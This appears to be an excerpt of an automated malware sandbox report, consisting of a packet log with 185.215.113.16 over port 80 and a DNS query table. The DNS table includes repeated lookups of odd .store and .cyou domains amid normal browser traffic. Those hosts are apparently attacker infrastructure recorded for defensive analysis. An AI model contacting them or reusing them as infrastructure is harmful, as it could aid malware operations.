Nov 4, 2024 17:32:19.334400892 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334486008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334501982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334513903 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334534883 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334534883 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334566116 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334650040 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334661961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334672928 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334685087 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334712982 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334712982 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334757090 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334786892 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334799051 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334810972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334822893 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334830999 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334837914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.334853888 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334877968 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.334918976 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.335118055 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.335130930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.335140944 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.335151911 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.335169077 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.335180998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.335181952 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.335207939 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.335300922 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.375924110 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.375940084 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376043081 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376058102 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376071930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376082897 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376101971 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376111031 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376141071 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376174927 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376241922 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376257896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376272917 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376285076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376295090 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376306057 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376306057 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376341105 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376341105 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376368046 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376368046 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376384020 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376398087 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376410007 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376425982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376431942 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376434088 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376458883 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376458883 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376477957 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376550913 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376622915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.376727104 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376739025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.376785040 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.417224884 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.417306900 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.417644024 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.417654991 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.417666912 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.417709112 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.417709112 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450293064 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450375080 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450439930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450449944 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450490952 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450510025 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450510979 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450524092 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450535059 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450547934 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450578928 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450578928 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450639963 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450678110 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450690031 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450701952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450711012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450742006 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450742006 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450771093 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450865030 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450922012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450933933 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.450969934 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.450969934 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451013088 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451023102 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451056004 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451100111 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451211929 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451250076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451261044 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451292038 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451292038 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451328039 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451395988 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451407909 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451422930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451431036 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451453924 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451464891 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451523066 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451536894 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451590061 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451759100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451778889 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451798916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451801062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451838970 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451838970 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451916933 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451927900 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.451962948 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.451987982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.452003956 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.452008963 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.452017069 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.452028990 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.452047110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.452047110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.452079058 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492664099 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492768049 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492794991 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492805958 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492815971 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492835045 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492847919 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492850065 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492894888 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492894888 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492919922 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492929935 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492964983 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.492974043 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492985964 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.492997885 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493015051 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493015051 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493071079 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493119955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493161917 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493181944 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493192911 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493237019 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493237019 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493318081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493329048 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493386030 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493396997 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493439913 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493446112 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493458033 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493495941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493495941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493510008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493565083 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493630886 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493674994 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:19.493702888 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493715048 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:19.493726015 CET	80	49990	185.215.113.16	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 4, 2024 17:32:23.022241116 CET	192.168.2.5	1.1.1.1	0xd86c	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.050117970 CET	192.168.2.5	1.1.1.1	0xaac	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.076922894 CET	192.168.2.5	1.1.1.1	0xfd66	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.104876041 CET	192.168.2.5	1.1.1.1	0xfb12	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.132904053 CET	192.168.2.5	1.1.1.1	0xd716	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.160249949 CET	192.168.2.5	1.1.1.1	0x1c6d	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:25.639034033 CET	192.168.2.5	1.1.1.1	0x241a	Standard query (0)	terracedjz.cyou	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:36.605710030 CET	192.168.2.5	1.1.1.1	0x3940	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.059155941 CET	192.168.2.5	1.1.1.1	0x4ebc	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.093671083 CET	192.168.2.5	1.1.1.1	0x8dee	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.170490980 CET	192.168.2.5	1.1.1.1	0xc5ea	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.197386026 CET	192.168.2.5	1.1.1.1	0x11dd	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:45.320787907 CET	192.168.2.5	1.1.1.1	0xf0b6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:45.320789099 CET	192.168.2.5	1.1.1.1	0x3d1f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 4, 2024 17:32:47.374330997 CET	192.168.2.5	1.1.1.1	0x4600	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:47.389558077 CET	192.168.2.5	1.1.1.1	0x83cc	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:32:49.483591080 CET	192.168.2.5	1.1.1.1	0xf503	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.483773947 CET	192.168.2.5	1.1.1.1	0x35c1	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.502863884 CET	192.168.2.5	1.1.1.1	0xc63a	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.503026962 CET	192.168.2.5	1.1.1.1	0x371c	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.511034012 CET	192.168.2.5	1.1.1.1	0xdc9f	Standard query (0)	youtube.com	28	IN (0x0001)	false
Nov 4, 2024 17:32:49.511354923 CET	192.168.2.5	1.1.1.1	0x88ff	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:32:50.961877108 CET	192.168.2.5	1.1.1.1	0xafd4	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:50.962311983 CET	192.168.2.5	1.1.1.1	0xab22	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:51.007270098 CET	192.168.2.5	1.1.1.1	0xca9	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:51.016791105 CET	192.168.2.5	1.1.1.1	0xf130	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:51.034280062 CET	192.168.2.5	1.1.1.1	0x9b5d	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:32:52.047259092 CET	192.168.2.5	1.1.1.1	0xb87	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.048280001 CET	192.168.2.5	1.1.1.1	0x6631	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.059779882 CET	192.168.2.5	1.1.1.1	0x67c	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.067395926 CET	192.168.2.5	1.1.1.1	0x356a	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:32:52.374969006 CET	192.168.2.5	1.1.1.1	0xf41c	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.394367933 CET	192.168.2.5	1.1.1.1	0xbc32	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:32:53.071650028 CET	192.168.2.5	1.1.1.1	0x176a	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:53.102921009 CET	192.168.2.5	1.1.1.1	0x9c5c	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:53.131459951 CET	192.168.2.5	1.1.1.1	0xa35	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:32:59.301604986 CET	192.168.2.5	1.1.1.1	0xd6e8	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:59.302115917 CET	192.168.2.5	1.1.1.1	0x9734	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:00.528284073 CET	192.168.2.5	1.1.1.1	0xcd58	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:00.528661966 CET	192.168.2.5	1.1.1.1	0xc76a	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 4, 2024 17:33:02.333797932 CET	192.168.2.5	1.1.1.1	0x9963	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.334063053 CET	192.168.2.5	1.1.1.1	0x19a3	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:02.351248980 CET	192.168.2.5	1.1.1.1	0x67bf	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.351535082 CET	192.168.2.5	1.1.1.1	0x6843	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:02.360857964 CET	192.168.2.5	1.1.1.1	0xa157	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.361012936 CET	192.168.2.5	1.1.1.1	0x593f	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:02.369816065 CET	192.168.2.5	1.1.1.1	0xe790	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.369992018 CET	192.168.2.5	1.1.1.1	0xa22b	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:04.208293915 CET	192.168.2.5	1.1.1.1	0xb170	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.208461046 CET	192.168.2.5	1.1.1.1	0xb6ed	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:04.208744049 CET	192.168.2.5	1.1.1.1	0xe8e	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.208868980 CET	192.168.2.5	1.1.1.1	0x2bfa	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:04.251506090 CET	192.168.2.5	1.1.1.1	0xd759	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.251658916 CET	192.168.2.5	1.1.1.1	0x8527	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 4, 2024 17:33:07.038101912 CET	192.168.2.5	1.1.1.1	0x2656	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.075273037 CET	192.168.2.5	1.1.1.1	0x7454	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.103508949 CET	192.168.2.5	1.1.1.1	0x3502	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.133321047 CET	192.168.2.5	1.1.1.1	0xba17	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.158535004 CET	192.168.2.5	1.1.1.1	0xe03a	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.165631056 CET	192.168.2.5	1.1.1.1	0xa601	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.362576008 CET	192.168.2.5	1.1.1.1	0x9467	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.445427895 CET	192.168.2.5	1.1.1.1	0x91a8	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.454081059 CET	192.168.2.5	1.1.1.1	0xaa81	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.526228905 CET	192.168.2.5	1.1.1.1	0x3ed9	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.536667109 CET	192.168.2.5	1.1.1.1	0x257b	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.626152039 CET	192.168.2.5	1.1.1.1	0xd08f	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.675236940 CET	192.168.2.5	1.1.1.1	0xa13	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.746243954 CET	192.168.2.5	1.1.1.1	0x2715	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.764940023 CET	192.168.2.5	1.1.1.1	0x3b2c	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.793457985 CET	192.168.2.5	1.1.1.1	0xa67d	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.836405039 CET	192.168.2.5	1.1.1.1	0x1289	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.840023994 CET	192.168.2.5	1.1.1.1	0x37c7	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.848171949 CET	192.168.2.5	1.1.1.1	0x31f2	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.869519949 CET	192.168.2.5	1.1.1.1	0x660a	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:31.869693041 CET	192.168.2.5	1.1.1.1	0x13cd	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:32.055655003 CET	192.168.2.5	1.1.1.1	0xaed4	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.979772091 CET	192.168.2.5	1.1.1.1	0x33fc	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.980007887 CET	192.168.2.5	1.1.1.1	0x637b	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.980240107 CET	192.168.2.5	1.1.1.1	0x4a32	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.991305113 CET	192.168.2.5	1.1.1.1	0xae8d	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.992167950 CET	192.168.2.5	1.1.1.1	0x60de	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.992952108 CET	192.168.2.5	1.1.1.1	0xa295	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.007793903 CET	192.168.2.5	1.1.1.1	0x509c	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Nov 4, 2024 17:33:35.008900881 CET	192.168.2.5	1.1.1.1	0x8ebc	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:35.009383917 CET	192.168.2.5	1.1.1.1	0xae94	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:35.065474033 CET	192.168.2.5	1.1.1.1	0x7692	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.066289902 CET	192.168.2.5	1.1.1.1	0x3fb7	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
